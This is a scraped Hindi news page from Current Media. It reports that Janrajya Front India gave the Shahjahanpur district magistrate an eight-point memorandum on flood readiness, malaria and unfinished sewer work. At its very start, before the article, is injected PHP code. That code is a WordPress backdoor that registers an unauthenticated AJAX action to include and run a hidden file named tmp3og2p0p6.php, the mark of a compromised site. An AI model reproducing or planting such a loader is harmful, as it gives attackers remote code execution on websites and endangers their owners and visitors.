if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }बाढ़, मलेरिया और सीवर संकट पर जनराज्य फ्रंट इंडिया सक्रिय, डीएम को सौंपा ज्ञापन - Current Media

बाढ़, मलेरिया और सीवर संकट पर जनराज्य फ्रंट इंडिया सक्रिय, डीएम को सौंपा ज्ञापन

शाहजहांपुर। मो0 आफाक । जनराज्य फ्रंट इंडिया संगठन ने संभावित बाढ़ और मलेरिया के खतरे को लेकर चिंता जताई है। संगठन ने बुधवार को जिलाधिकारी को ज्ञापन सौंपकर मुख्यमंत्री के नाम 8 सूत्रीय मांगपत्र प्रेषित किया। ज्ञापन में कहा गया है कि बीते वर्ष जिले के ग्रामीण और नगरीय इलाकों में बाढ़ ने भारी तबाही मचाई थी। जान-माल के साथ संपत्ति का भी बड़ा नुकसान हुआ था। संगठन ने इस बार बाढ़ से पहले व्यापक प्रबंधन की मांग की है। संगठन ने निम्न बिन्दुओ पर अपनी मांग रखी बरसात से पहले नालों की सफाई कराई जाए ताकि पानी मोहल्लों में न घुसे। पुलों की ऊंचाई तय मानकों के अनुसार न होने से बाढ़ का पानी रुकता है, इनकी जांच की जाए। नदियों की धाराएं बदलने से कई इलाकों में बाढ़ का खतरा रहता है, विशेष तकनीकी जांच कराई जाए। शहर में वर्षों से अधूरी सीवर लाइन परियोजना को जल्द पूरा कराया जाए। सीवरों और सड़कों पर पड़े गड्ढों को भरवाया जाए।बारिश में डेंगू-मलेरिया जैसी बीमारियों के फैलाव को रोकने के लिए दवाओं की उपलब्धता और स्वास्थ्य अमला सक्रिय किया जाए। जिले में मलेरिया की रोकथाम के लिए आईसीएमआर और एनआईएमआर की टीम भेजी जाए। राष्ट्रीय संयोजक अजय मीरा पाण्डेय और जिलाध्यक्ष डॉ. प्रदीप अवस्थी ने बताया कि बाढ़ और बीमारी के हर साल बढ़ते खतरे को देखते हुए समय से तैयारी बेहद जरूरी है। उन्होंने चेताया कि यदि मांगों पर शीघ्र कार्यवाही नहीं हुई तो जनमानस को गंभीर संकट से गुजरना पड़ सकता है।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

शांतिपूर्ण माहौल में अदा हुई ईद-उल-अज़हा की नमाज

शाहजहांपुर। मो0आफाक । शाहजहांपुर में ईद-उल-अजहा का त्योहार गुरुवार को शांतिपूर्ण और सौहार्दपूर्ण माहौल में …